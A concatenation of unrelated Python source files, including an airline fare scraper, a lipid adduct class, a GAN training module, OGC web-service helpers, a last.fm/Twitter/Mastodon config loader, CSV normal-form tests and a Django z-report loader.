for resp in response.json()
]
def _normalize_response(self, response: Dict[str, Any]) -> Dict[datetime, Flight]:
if not response:
return None
normalize: Dict[datetime, Flight] = {}
for (
key_year,
months,
) in (
response.items()
): # key_year: str, months: Dict[str, Dict[str, Dict[str, Any]]]
year: int = int(key_year)
for (
key_month,
days,
) in months.items(): # key_month: str, days: Dict[str, Dict[str, Any]]
month: int = int(key_month)
for (
key_day,
flight,
) in days.items(): # key_day: str, flight: Dict[str, Any]
day: int = int(key_day)
normalize[datetime(year, month, day)] = Flight(
arrival_airport=flight.get("arrival_airport"),
currency=flight.get("currency"),
day=datetime.strptime(flight.get("day"), "%Y-%m-%d"),
departure_airport=flight.get("departure_airport"),
is_offer=flight.get("is_offer"),
price=float(flight.get("price")),
tax=float(flight.get("tax")),
)
return normalize
def get_departure_availability(self, trip: Trip) -> Dict[datetime, Flight]:
payload: List[FrenchBeeResponse] = self._make_search_request(
source=trip.origin_depart.location.code,
destination=trip.destination_return.location.code,
passengers=trip.passengers,
departure=None,
returns=None,
module="visible_newsearch_flights_to",
)
info: FrenchBeeResponse = next(
filter(lambda r: r.args[0] == "departureCalendarPriceIsReady", payload),
None,
)
return (
self._normalize_response(info.args[1].get("departure"))
if len(info.args) >= 2 and info.args[1]
else None
)
def get_return_availability(self, trip: Trip) -> Dict[datetime, Flight]:
payload: List[FrenchBeeResponse] = self._make_search_request(
source=trip.origin_depart.location.code,
destination=trip.destination_return.location.code,
passengers=trip.passengers,
departure=trip.origin_depart.date,
returns=None,
module="visible_newsearch_flights_departure_date",
)
info: FrenchBeeResponse = next(
filter(lambda i: i.args[0] == "returnCalendarPriceIsReady", payload), None
)
return (
self._normalize_response(info.args[1].get("return"))
if len(info.args) >= 2 and info.args[1]
else None
)
def get_departure_info_for(self, trip: Trip) -> Flight:
info: Dict[datetime, Flight] = self.get_departure_availability(trip)
return info.get(trip.origin_depart.date) if info else None
def get_return_info_for(self, trip: Trip) -> Flight:
info: Dict[datetime, Flight] = self.get_return_availability(trip)
return info.get(trip.destination_return.date) if info else None
def get_flight_times(self, trip: Trip) -> Trip:
form_url, form_inputs = self._get_flight_times_form_parameters(trip)
token: str = FrenchBeeReese84().token()
self.session.cookies.set("reese84", token, domain="vols.frenchbee.com")
response: Response = self.session.post(form_url, data=form_inputs)
html_body: str = response.text
script: Dict[str, Any] = self._get_flight_times_script(html_body)
with open("s.json", "w") as f:
f.write(json.dumps(script, indent=4, sort_keys=True))
bounds: List[Dict[str, Any]] = self._get_json_path(
script,
"$.pageDefinitionConfig.pageData.business.Availability.proposedBounds",
)
departure_options: List[Dict[str, Any]] = bounds[0].get(
"proposedFlightsGroup", []
)
return_options: List[Dict[str, Any]] = bounds[1].get("proposedFlightsGroup", [])
trip.origin_segments = list(self._get_segment_options(departure_options))
trip.destination_segments = list(self._get_segment_options(return_options))
return trip
def _get_flight_times_form_parameters(
self, trip: Trip
) -> Tuple[str, Dict[str, str]]:
payload: List[FrenchBeeResponse] = self._make_search_request(
source=trip.origin_depart.location.code,
destination=trip.destination_return.location.code,
passengers=trip.passengers,
departure=trip.origin_depart.date,
returns=trip.destination_return.date,
module="op",
)
resp: FrenchBeeResponse = next(
filter(lambda i: i.command == "insert", payload), None
)
form_match: re.Match = re.search(
'\<form[^\>]*action="([^"]+)"[^\>]*>', resp.data
)
if not form_match:
return
form_url: str = form_match.group(1)
input_match: List[Tuple[str, str]] = re.findall(
'\<input[^\>]*name="([^"]+)"[^\>]*value="([^"]+)"[^\>]*>', resp.data
)
form_inputs: Dict[str, str] = {key: value for key, value in input_match}
if "EXTERNAL_ID" in form_inputs:
form_inputs["EXTERNAL_ID"] = html.unescape(form_inputs["EXTERNAL_ID"])
return (form_url, form_inputs)
def _get_flight_times_script(self, html_body: str) -> Dict[str, Any]:
script_start: str = "PlnextPageProvider.init("
idx_start: int = html_body.index(script_start) + len(script_start)
idx_start = html_body.index(
"config", idx_start
) # outer layer is not valid JSON
idx_start = html_body.index("{", idx_start)
script_end: str = "pageEngine"
idx_end: int = html_body.index(script_end, idx_start)
idx_end = (
html_body.rindex("}", idx_start, idx_end) + 1
) # walk backwards to find the end
script: str = html_body[idx_start:idx_end]
return json.loads(script)
def _get_segment_options(
self, options: List[Dict[str, Any]]
) -> Iterable[List[Segment]]:
for option in options:
segments_for_option: List[Segment] = option.get("segments", [])
segments: List[Segment] = []
for segment_option in segments_for_option:
segment: Segment = Segment(
airline_code=segment_option.get("airline", {}).get("code"),
airline_name=segment_option.get("airline", {}).get("name"),
flight_num=segment_option.get("flightNumber"),
duration=int(segment_option.get("segmentTime") or "0"),
start=DateAndLocation(
date=self._get_datetime_gmt(segment_option.get("beginDateGMT")),
location=Location(
code=segment_option.get("beginLocation", {}).get(
"locationCode"
),
name=segment_option.get("beginLocation", {}).get(
"locationName"
),
terminal=segment_option.get("beginTerminal"),
transport=segment_option.get("equipment", {}).get("name"),
),
),
end=DateAndLocation(
date=self._get_datetime_gmt(segment_option.get("endDateGMT")),
location=Location(
code=segment_option.get("endLocation", {}).get(
"locationCode"
),
name=segment_option.get("endLocation", {}).get(
"locationName"
),
terminal=segment_option.get("endTerminal"),
),
),
)
segments.append(segment)
yield segments
def _get_json_path(self, json_object: Any, path: str, default: Any = None) -> Any:
extractor = jsonpath.parse(path) # no type given
matches = extractor.find(json_object)
if matches:
if len(matches) == 1:
return matches[0].value
return [match.value for match in matches]
return default
def _get_datetime_gmt(self, value: str, default: Any = None) -> datetime:
if value:
return datetime.strptime(value, "%b %d, %Y %I:%M:%S %p")
return default
|
"""
MIT License
Copyright (c) 2020 <NAME> - dominik.kopczynski {at} isas.de
<NAME> - nils.hoffmann {at} isas.de
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from pygoslin.domain.Element import Element
from pygoslin.parser.ParserCommon import SumFormulaParser
from pygoslin.domain.LipidExceptions import *
class Adduct:
adduct_sum_formula_parser = SumFormulaParser()
adducts = {"+H": {Element.H: 1},
"+2H": {Element.H: 2},
"+3H": {Element.H: 3},
"+4H": {Element.H: 4},
"-H": {Element.H: -1},
"-2H": {Element.H: -2},
"-3H": {Element.H: -3},
"-4H": {Element.H: -4},
"+H-H2O": {Element.H: -1, Element.O: -1},
"+NH4": {Element.N: 1, Element.H: 4},
"+Cl": {Element.Cl: 1},
"+HCOO": {Element.H: 1, Element.C: 1, Element.O: 2},
"+CH3COO": {Element.H: 3, Element.C: 2, Element.O: 2}
}
adduct_charges = {"+H": 1, "+2H": 2, "+3H": 3, "+4H": 4, "-H": -1,
"-2H": -2, "-3H": -3, "-4H": -4, "+H-H2O": 1,
"+NH4": 1, "+Cl": -1, "+HCOO": -1, "+CH3COO": -1
}
def __init__(self, sum_formula, adduct_string, charge = 1, sign = 1):
self.sum_formula = sum_formula
self.adduct_string = adduct_string
self.charge = charge
self.set_charge_sign(sign)
def set_charge_sign(self, sign):
if sign in {-1, 1}:
self.charge_sign = sign
else: raise ConstraintViolationException("Sign can only be - or +")
def get_lipid_string(self):
if self.charge == 0: return "[M]"
return "[M%s%s]%i%s" % (self.sum_formula, self.adduct_string, self.charge, "+" if self.charge_sign > 0 else "-")
def get_elements(self):
elements = {e: 0 for e in Element}
if self.adduct_string in Adduct.adducts:
if Adduct.adduct_charges[self.adduct_string] != self.get_charge():
raise ConstraintViolationException("Provided charge '%i' in contradiction to adduct '%s' charge '%i'." % (self.get_charge(), self.adduct_string, Adduct.adduct_charges[self.adduct_string]))
for k, v in Adduct.adducts[self.adduct_string].items():
elements[k] = v
else:
raise ConstraintViolationException("Adduct '%s' is unknown." % self.adduct_string)
return elements
def get_charge(self):
return self.charge * self.charge_sign
|
import filecmp
import pytest
import pandas as pd
import pandera
import crowsetta.formats
class TestRavenSchema:
COLUMNS_MAP = {
"Begin Time (s)": "begin_time_s",
"End Time (s)": "end_time_s",
"Low Freq (Hz)": "low_freq_hz",
"High Freq (Hz)": "high_freq_hz",
"Species": "annotation"
}
def test_raven_schema_phn_df(self,
a_raven_txt_file):
df = pd.read_csv(a_raven_txt_file, sep='\t')
df.columns = df.columns.map(self.COLUMNS_MAP)
df = crowsetta.formats.bbox.raven.RavenSchema.validate(df)
# if validation worked, we get back a DataFrame
assert isinstance(df, pd.DataFrame)
def test_raven_schema_bad_df(self,
a_raven_txt_file):
df = pd.read_csv(a_raven_txt_file, sep='\t')
# if we do not `map` the names, they will already be invalid
with pytest.raises(pandera.errors.SchemaError):
crowsetta.formats.bbox.raven.RavenSchema.validate(df)
def test_from_file(a_raven_txt_file,
raven_dataset_annot_col):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
assert isinstance(raven, crowsetta.formats.bbox.Raven)
def test_from_file_str(a_raven_txt_file,
raven_dataset_annot_col):
a_raven_txt_file = str(a_raven_txt_file)
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
assert isinstance(raven, crowsetta.formats.bbox.Raven)
def test_file_with_no_rows_raises(raven_txt_file_with_no_rows):
with pytest.raises(ValueError):
crowsetta.formats.bbox.Raven.from_file(annot_path=raven_txt_file_with_no_rows)
def test_to_bbox(a_raven_txt_file,
raven_dataset_annot_col):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
bboxes = raven.to_bbox()
assert isinstance(bboxes, list)
assert all(
[isinstance(bbox, crowsetta.BBox) for bbox in bboxes]
)
def test_to_annot(a_raven_txt_file,
raven_dataset_annot_col):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
annot = raven.to_annot()
assert isinstance(annot, crowsetta.Annotation)
assert hasattr(annot, 'bboxes')
bboxes = annot.bboxes
assert isinstance(bboxes, list)
assert all(
[isinstance(bbox, crowsetta.BBox) for bbox in bboxes]
)
def test_to_raven(a_raven_txt_file,
raven_dataset_annot_col,
tmp_path):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
annot_out_path = tmp_path / a_raven_txt_file.name
raven.to_file(annot_path=annot_out_path)
df_txt = pd.read_csv(a_raven_txt_file, sep='\t')
df_out = pd.read_csv(annot_out_path, sep='\t')
assert df_txt.equals(df_out)
|
from argparse import ArgumentParser
from collections import OrderedDict
from typing import Tuple
import torchvision
from pytorch_lightning import LightningModule
import torch
import torch.nn.functional as F
from gan.discriminators import Discriminator
from gan.generators import Generator
class Gan(LightningModule):
"""Adapted from Lightning GAN example"""
def __init__(
self,
img_shape: Tuple[int, int, int],
latent_dim: int,
pos_label: float = 0.9,
neg_label: float = 0.1,
lr: float = 1e-3,
b1: float = 0.9,
b2: float = 0.999,
**kwargs
):
super(Gan, self).__init__()
assert 0. <= neg_label < pos_label <= 1., 'Invalid labels'
self.latent_dim = latent_dim
self.lr = lr
self.b1 = b1
self.b2 = b2
self.pos_label = pos_label
self.neg_label = neg_label
# networks
self.generator = Generator(latent_dim=latent_dim, img_shape=img_shape)
self.discriminator = Discriminator(img_shape=img_shape)
# cache for generated images
self.generated_imgs = None
self.last_imgs = None
def forward(self, z):
return self.generator(z)
def adversarial_loss(self, y_hat, y):
return F.binary_cross_entropy(y_hat, y)
def training_step(self, batch, batch_nb, optimizer_idx):
imgs, _ = batch
self.last_imgs = imgs
# train generator
if optimizer_idx == 0:
# sample noise
z = torch.randn(imgs.shape[0], self.latent_dim)
if self.on_gpu:
z = z.cuda(imgs.device.index)
self.generated_imgs = self(z)
# ground truth result (ie: all fake)
valid = torch.ones(imgs.size(0), 1)
if self.on_gpu:
valid = valid.cuda(imgs.device.index)
# adversarial loss is binary cross-entropy
g_loss = self.adversarial_loss(self.discriminator(self.generated_imgs), valid)
tqdm_dict = {'g_loss': g_loss}
output = OrderedDict({
'loss': g_loss,
'progress_bar': tqdm_dict,
'log': tqdm_dict
})
return output
# train discriminator
if optimizer_idx == 1:
valid = torch.ones(imgs.size(0), 1) * self.pos_label
if self.on_gpu:
valid = valid.cuda(imgs.device.index)
real_loss = self.adversarial_loss(self.discriminator(imgs), valid)
fake = torch.ones(imgs.size(0), 1) * self.neg_label
if self.on_gpu:
fake = fake.cuda(imgs.device.index)
fake_loss = self.adversarial_loss(
self.discriminator(self.generated_imgs.detach()), fake)
d_loss = (real_loss + fake_loss) / 2
tqdm_dict = {'d_loss': d_loss}
output = OrderedDict({
'loss': d_loss,
'progress_bar': tqdm_dict,
'log': tqdm_dict
})
return output
def configure_optimizers(self):
lr = self.lr
b1 = self.b1
b2 = self.b2
opt_g = torch.optim.Adam(self.generator.parameters(), lr=lr, betas=(b1, b2))
opt_d = torch.optim.Adam(self.discriminator.parameters(), lr=lr, betas=(b1, b2))
return [opt_g, opt_d], []
@staticmethod
def add_model_specific_args(parent_parser):
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser.add_argument('--latent_dim', type=int, default=128)
parser.add_argument('--lr', type=float, default=1e-3)
parser.add_argument('--b1', type=float, default=.9)
parser.add_argument('--b2', type=float, default=.999)
parser.add_argument('--neg_label', type=float, default=0.)
parser.add_argument('--pos_label', type=float, default=.9)
return parser
def on_epoch_end(self):
z = torch.randn(8, self.latent_dim)
if self.on_gpu:
z = z.cuda(self.last_imgs.device.index)
sample_imgs = self(z)
grid = torchvision.utils.make_grid(sample_imgs)
self.logger.experiment.add_image(f'generated_images', grid, self.current_epoch)
|
"""
Module ``_helpers``.
"""
import xml.dom.minidom as dom
import urllib
from ows_checker._helpers import xml2dict
DEFAULT_TIMEOUT = 100
class ResponseDict(dict):
"""
Die Klasse L{ResponseDict} formuliert ein C{dict}-Objekt mit vier festen
Parametern und vier festen Rückgabewerten.
B{Aufruf}:
>>> r = ResponseDict("WMS-04 Checker", ["alles gut"], True, ["WMS-04"])
>>> r
{'checker': "WMS-04 Checker", 'results':["alles gut"], 'status': True, 'hints':["WMS-04"]}
>>> r.status
True
@ivar checker: Name der Methode
@type checker: str, bytes
@ivar results: Resultat(e)
@type results: list
@ivar status: Status der Überprüfung
@type status: bool
@ivar hints: Hinweise bezüglich Richtlinie(n)
@type hints: list
@ivar response_dict: Zusammengefasstes Schema
@type response_dict: dict
"""
def __init__(self, checker, results, status, hints = False):
"""
@param checker: Name der Methode
@type checker: str, bytes, list
@param results: Resultat(e)
@type results: str, bytes, list
@param status: Status der Überprüfung
@type status: bool
@param hints: Optionale Hinweise bezüglich Richtlinie(n)
@type hints: str, bytes, list
"""
self.hints = hints
if isinstance(checker, (str, bytes)):
self.checker = checker
else:
raise ValueError("Es muss ein String für Checker übergeben werden")
if isinstance(results, (str, bytes)):
self.results = [results]
elif isinstance(results, list):
self.results = results
else:
raise ValueError(u"Es muss ein String oder eine Liste für Results übergeben werden")
if isinstance(status, bool):
self.status = status
else:
raise ValueError(u"Es muss ein Boolean für Status übergeben werden")
if self.hints:
if isinstance(hints, (str)):
self.hints = [(hints.encode('utf-8'))]
elif isinstance(hints, list):
self.hints = hints
self.response_dict = {'checker':self.checker,
'results':self.results,
'status':self.status,
'hints':self.hints}
dict.__init__(self, self.response_dict)
def URL2File(url, headers={}, timeout=DEFAULT_TIMEOUT, auth={}):
"""
Wandelt eine URL in ein Dateiobjekt um.
B{Funktionsweise}:
1. Es wird ein HTTP-Request aus C{url} formuliert
2. Es wird ein Dateiobjekt erstellt und dieses zurückgegeben
Zusätzlich wird ein Timeout von standardmässig fünf
Sekunden verwendet, um die Usability nicht zu beeinträchtigen.
B{Beispiel}:
>>> u = URL2File("http://example.com/test.xml")
>>> u.info().gettype()
"text/xml"
@param url: URL
@type url: str
@param headers: Optionale Header-Informationen
@type headers: dict
@param timeout: Timeout in Sekunden
@type timeout: int
@return: Datei
@rtype: C{file}-Objekt
"""
url = _ns(url)
headers.update({
'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
})
if auth:
username = auth.get('user','user')
password = auth.get('pass','<PASSWORD>')
passman = urllib.error.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, url, username, password)
authhandler = urllib.error.HTTPBasicAuthHandler(passman)
opener = urllib.error.build_opener(authhandler)
urllib.request.install_opener(opener)
file = urllib.request.urlopen(url)
else:
req = urllib.request.Request(url, None, headers)
file = urllib.request.urlopen(url=req, timeout=timeout)
return file
def URL2XML2Dict(url):
xmldict = xml2dict.XML2Dict()
f = URL2File(url)
tree = dom.parse(f)
f.close()
header = f.info().gettype()
assert 'xml' in header
for node in tree.childNodes:
if node.nodeType == dom.Node.ELEMENT_NODE:
body = node.toxml('utf-8')
xmldict = xmldict.fromstring(body)
return xmldict
def ns(e):
"""
Ein Workaround für XML-Namespaces, von C{pickle} erzeugten C{'__dict__'}-Objekten
und von L{_helpers.xml2dict.XML2Dict} erzeugten C{'value'}-Objekten.
B{Beispiel 1}:
>>> e = {'value':'Ein Wert', '__dict__':{}}
>>> ns(e)
"Ein Wert"
B{Beispiel 2}: z.B. falls ein C{list}-Objekt mit C{dict.keys()} erzeugt wurde
>>> e = ['value', 'Ein Wert', 'Noch ein Wert', 'namespace', '__dict_']
>>> ns(e)
['Ein Wert', 'Noch ein Wert']
@param e: Objekt mit unbrauchbaren und brauchbaren Werten
@type e: str, list, dict
@return: Objekt mit brauchbaren Werten
@rtype: str, list
"""
entity = None
# {'__dict__':{}, ...}
if isinstance(e, dict):
e.pop('__dict__',None)
entity = e.value
# ['value', 'namespace', '__dict__', ...]
elif isinstance(e, list):
if 'value' in e:
e.remove('value')
if 'namespace' in e:
e.remove('namespace')
if '__dict__' in e:
e.remove('__dict__')
entity = e
elif isinstance(e, str):
entity = e
else:
entity = e
return entity
def unify(l):
"""
L{unify} löscht alle Duplikate aus einer Liste.
@param l: Liste mit Duplikaten
@type l: list
@return: Liste ohne Duplikate
@rtype: list
"""
return list(set(l))
def value(l):
"""
Gibt die Wert des Schlüssels C{value} aus einem dict in einer Liste C{l} zurück.
B{Beispiel}:
>>> l = [{'value': 'vnd.ogc.wms_xml'}, {'value': 'vnd.ogc.gml'}]
>>> value(l)
['vnd.ogc.wms_xml', 'vnd.ogc.gml' ]
@param l: Liste mit dict-Objekten
@type l: list, str
@return: Werte des Attributs C{value}
@rtype: list
"""
v = []
if isinstance(l, dict):
v.append(l.value)
if isinstance(l, list):
for i in l:
v.append(i.value)
elif isinstance(l, str):
v = [l]
return v
def removeCharsetFromMime(s):
"""
Löscht z.B. die Zeichenkette C{UTF-8} aus der Zeichenkette
C{text/xml;UTF-8} heraus, sodass nur C{text/xml} zurückgegeben wird.
B{Beispiel}:
>>> s = "text/xml;UTF-8"
>>> removeCharsetFromMime(s)
"text/xml"
@param s: Zeichenkette C{text/xml;UTF-8}
@type s: str
@return: Zeichenkette C{text/xml}
@rtype: str
"""
if "charset" in s:
l = s.split(";")
l = l[0]
else:
l = s
return l
def filterkey(e, key, ns=False):
"""
Gibt eine Liste aus der Liste C{e} mit dem Attribut C{key} zurück.
B{Beispiel 1}: Herauslesen der SRS aus einer Liste, die C{dict}'s enthält.
>>> e = [{'SRS':'12345', 'Name':'WGS-1'}, {'SRS':'54321', 'Name':'WGS-2'}]
>>> key = "SRS"
>>> filterkey(e, key)
['12345', '54321']
B{Beispiel 2}: Herauslesen des Namens aus einer Liste, die C{dict}'s enthält.
>>> e = [{'SRS':'12345', 'Name':'WGS-1'}, {'SRS':'54321', 'Name':'WGS-2'}]
>>> key = "Name"
>>> filterkey(e, key)
['WGS-1', 'WGS-2']
@param e: Liste
@type e: list
@param key: Schlüssel
@type key: str
@param ns: Status, ob zusätzlich L{_helpers.ns} verwendet werden soll
@type ns: bool
@return: Liste mit den gefundenen Attributen C{key}
@rtype: list
"""
l = []
key_split = key.split("=")
if isinstance(e, list):
for i in e:
if len(key_split)>1:
if i[key_split[0]] == key_split[1]:
if ns:
l.append(_ns(i[key_split[0]]))
else:
l.append(i[key_split[0]])
else:
if ns:
l.append(_ns(i[key]))
else:
l.append(i[key])
return l
def b(node):
"""
Converts a string "0" or "1" to Python's ``True`` and ``False``
"""
return bool(int(node))
def dict2list(obj):
"""
Converts an ``obj`` (Dict, List) to a List
"""
if isinstance(obj, dict):
return [obj]
return obj
_b = b
_filterkey = filterkey
_removeCharsetFromMime = removeCharsetFromMime
_value = value
_ns = ns
|
<gh_stars>1-10
from pathlib import Path
import logging
import configparser
import pylast
import tweepy
import os
from mastodon import Mastodon
logger = logging.getLogger()
logging.getLogger("pylast").setLevel(logging.WARNING)
def check_config(config_file): # pragma: no cover
config_file = os.path.expanduser(config_file)
user_config_dir = os.path.expanduser("~/.config/lastfm_pg/")
logger.debug("Checking configuration at %s.", config_file)
if Path(config_file).is_file():
try:
global CONFIG
CONFIG = configparser.ConfigParser()
CONFIG.read(config_file)
api_key = CONFIG["lastfm"]["api_key"]
except Exception as e:
logger.error(
(
"Error with the config file. Be sure to have a valid "
"~/.config/lastfm_pg/config.ini file. Error : %s"
),
e,
)
exit()
else:
if not os.path.exists(user_config_dir):
logger.info(
("Configuration folder not found. " "Creating ~/.config/lastfm_pg/.")
)
os.makedirs(user_config_dir)
if not Path(config_file).is_file():
sample_config = (
"[lastfm]\n"
"username=username_here\n"
"api_key=api_key_here\n"
"api_secret=api_secret_here\n"
"\n"
"[twitter]\n"
"consumer_key=consumer_key_here\n"
"secret_key=secret_key_here\n"
"access_token=access_token_here\n"
"access_token_secret=access_token_secret_here\n"
"\n"
"[mastodon]\n"
"api_base_url=api_base_url_here\n"
"login_email=login_email_here\n"
"password=<PASSWORD>"
)
with open(config_file, "w") as f:
f.write(sample_config)
logger.info(
(
"A sample configuration file has been created at "
"~/.config/lastfm_pg/config.ini."
)
)
exit()
def twitterconnect(): # pragma: no cover
consumer_key = CONFIG["twitter"]["consumer_key"]
secret_key = CONFIG["twitter"]["secret_key"]
access_token = CONFIG["twitter"]["access_token"]
access_token_secret = CONFIG["twitter"]["access_token_secret"]
auth = tweepy.OAuthHandler(consumer_key, secret_key)
auth.set_access_token(access_token, access_token_secret)
return tweepy.API(auth)
def mastodonconnect(): # pragma: no cover
if not Path("mastodon_clientcred.secret").is_file():
Mastodon.create_app(
"mastodon_bot_lastfm_pg",
api_base_url=CONFIG["mastodon"]["api_base_url"],
to_file="mastodon_clientcred.secret",
)
if not Path("mastodon_usercred.secret").is_file():
mastodon = Mastodon(
client_id="mastodon_clientcred.secret",
api_base_url=CONFIG["mastodon"]["api_base_url"],
)
mastodon.log_in(
CONFIG["mastodon"]["login_email"],
CONFIG["mastodon"]["password"],
to_file="mastodon_usercred.secret",
)
mastodon = Mastodon(
access_token="<PASSWORD>",
api_base_url=CONFIG["mastodon"]["api_base_url"],
)
return mastodon
def lastfmconnect(): # pragma: no cover
api_key = CONFIG["lastfm"]["api_key"]
api_secret = CONFIG["lastfm"]["api_secret"]
username = CONFIG["lastfm"]["username"]
network = pylast.LastFMNetwork(
api_key=api_key, api_secret=api_secret, username=username
)
return network
def get_twitter_username(api):
return api.me().screen_name
def get_lastfm_username(api):
return api.username
|
# -*- coding: utf-8 -*-
"""
Unit tests for the normal form detection.
Author: <NAME>
"""
import unittest
from clevercsv.dialect import SimpleDialect
from clevercsv.normal_form import (
is_form_1,
is_form_2,
is_form_3,
is_form_4,
is_form_5,
)
class NormalFormTestCase(unittest.TestCase):
def test_form_1(self):
dialect = SimpleDialect(delimiter=",", quotechar='"', escapechar="")
self.assertTrue(is_form_1('"A","B","C"', dialect))
self.assertTrue(is_form_1('"A","B"\n"C","D"\n', dialect))
self.assertTrue(is_form_1('"A","","C"', dialect))
self.assertFalse(is_form_1('"A","B"\n"A"', dialect))
self.assertFalse(is_form_1('"A"\n"B"', dialect))
self.assertFalse(is_form_1('"A"\n"A","B"', dialect))
self.assertFalse(is_form_1('"A",,"C"', dialect))
self.assertFalse(is_form_1('"A",C', dialect))
self.assertFalse(is_form_1('"A"\n"b""A""c","B"', dialect))
def test_form_2(self):
dialect = SimpleDialect(delimiter=",", quotechar="", escapechar="")
self.assertTrue(is_form_2("1,2,3", dialect))
self.assertTrue(is_form_2("1,2,3\na,b,c\n", dialect))
self.assertTrue(is_form_2("<EMAIL>,3", dialect))
self.assertTrue(is_form_2("a,,3\n1,2,3", dialect))
self.assertFalse(is_form_2("1,2,3\n1,2\n4,5,6", dialect))
self.assertFalse(is_form_2("1", dialect))
self.assertFalse(is_form_2('1,"a"', dialect))
self.assertFalse(is_form_2("a;b,3", dialect))
self.assertFalse(is_form_2('"a,3,3\n1,2,3', dialect))
self.assertFalse(is_form_2('a,"",3\n1,2,3', dialect))
def test_form_3(self):
A = SimpleDialect(delimiter=",", quotechar="'", escapechar="")
Q = SimpleDialect(delimiter=",", quotechar='"', escapechar="")
self.assertTrue(is_form_3('A,B\nC,"D"', Q))
self.assertTrue(is_form_3('A,B\nC,"d,e"', Q))
self.assertFalse(is_form_3('A,\nC,"d,e"', Q))
self.assertFalse(is_form_3("3;4,B\nC,D", Q))
self.assertFalse(is_form_3('A,B\n"C",D\n', A))
self.assertTrue(is_form_3('A,B\n"C",D\n', Q))
def test_form_4(self):
quoted = SimpleDialect(delimiter="", quotechar='"', escapechar="")
unquoted = SimpleDialect(delimiter="", quotechar="", escapechar="")
self.assertTrue(is_form_4("A\nB\nC", unquoted))
self.assertTrue(is_form_4("1\n2\n3", unquoted))
self.assertTrue(is_form_4("A_B\n1\n2", unquoted))
self.assertTrue(is_form_4("A&B\n1\n2", unquoted))
self.assertTrue(is_form_4("A&B\n-1\n2", unquoted))
self.assertTrue(is_form_4('"A"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('"A", "B"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('"A","B"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('"A@b"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('A\n"-1"\n2', unquoted))
self.assertFalse(is_form_4("A B\n-1 3\n2 4", unquoted))
def test_form_5(self):
dialect = SimpleDialect(delimiter=",", quotechar='"', escapechar="")
self.assertTrue(is_form_5('"A,B"\n"1,2"\n"3,4"', dialect))
self.assertTrue(is_form_5('"A,B"\n"1,"\n"2,3"', dialect))
self.assertFalse(is_form_5("A,B\n1,2\n3,4", dialect))
self.assertFalse(is_form_5("A,B\n1,\n2,3", dialect))
self.assertFalse(is_form_5('"A,""B"""\n"1,"\n"2,3"', dialect))
if __name__ == "__main__":
unittest.main()
|
<filename>z/management/commands/loadreports.py
import re
from datetime import datetime
from io import open
from os import walk
from os.path import isdir, isfile, join
import pytz
from django.core.exceptions import ObjectDoesNotExist
from django.core.management.base import BaseCommand
from cyb_oko.settings import TIME_ZONE
from z.models import Kassetransaksjon, Kvittering, Salgsvare, Zrapport
class Command(BaseCommand):
args = "<file or directories ...>"
help = "Load the given z-report files into the database"
#
# Compiled regexes used to parse the input file
#
# Match all lines that we skip
skip_lines = re.compile(
r"^(\s$|\d[A-Z\/]|JOURNAL DES VENTES|FIN DE LECTURE|-D|B\s+\d+\s(TIROIR|TA|AT))"
)
# Match the start date lines
start_date = re.compile(r"^\/(\d{2}-\d{2}-\d{4} \d{2}:\d{2})")
# Match the receipt transaction lines
receipt_transaction = re.compile(
r"^([a-zA-Z])\s+(\d+)\s(.{15})\s+(-?\d+)\s+(-?\d+\.\d{2})"
)
# Match the receipt date line
receipt_date = re.compile(r"^ <(\d{2}-\d{2}-\d{2} \d{2}:\d{2})(\d{6})")
# Match the z-report date line
z_number = re.compile(r"^\s+Z READING NR (\d+)")
#
# Timezone stuff
#
# Store the pytz timezone object for out current timezone
tz = pytz.timezone(TIME_ZONE)
def handle(self, *args, **options):
print("Parsing in timezone: %s" % TIME_ZONE)
for arg in args:
self.parse_files(arg)
def parse_files(self, path):
if isdir(path):
for root, dirs, files in walk(path):
for file in files:
self.parse_file(join(root, file))
elif isfile(path):
self.parse_file(path)
def parse_file(self, file):
with open(file, "rt", encoding="iso8859-1") as f:
# Skip the first line
f.readline()
# Create models
self.z = Zrapport()
self.kvitteringer = []
self.new_receipt()
# Parse each line
for line in f:
self.parse_line(line)
# self.save_z()
def new_receipt(self):
# Store the previous receipt, if needed
if hasattr(self, "kvittering"):
self.kvitteringer.append(self.kvittering)
# Create a new one
self.kvittering = Kvittering()
self.kvittering.linjer = []
def save_z(self):
self.z.save()
self.z.kvitteringer = self.kvitteringer
for k in self.kvitteringer:
if len(k.linjer) > 0:
for linje in k.linjer:
linje.tidspunkt = k.tidspunkt
k.transaksjoner.add(linje)
def parse_line(self, line):
if self.skip_lines.search(line):
return
elif self.receipt_date_line(line):
self.new_receipt()
return
elif self.receipt_transaction_line(line):
return
elif self.z_number_line(line):
return
elif self.start_date_line(line):
return
else:
raise Exception("Unknown line: %s" % line)
def receipt_date_line(self, line):
m = self.receipt_date.search(line)
if m:
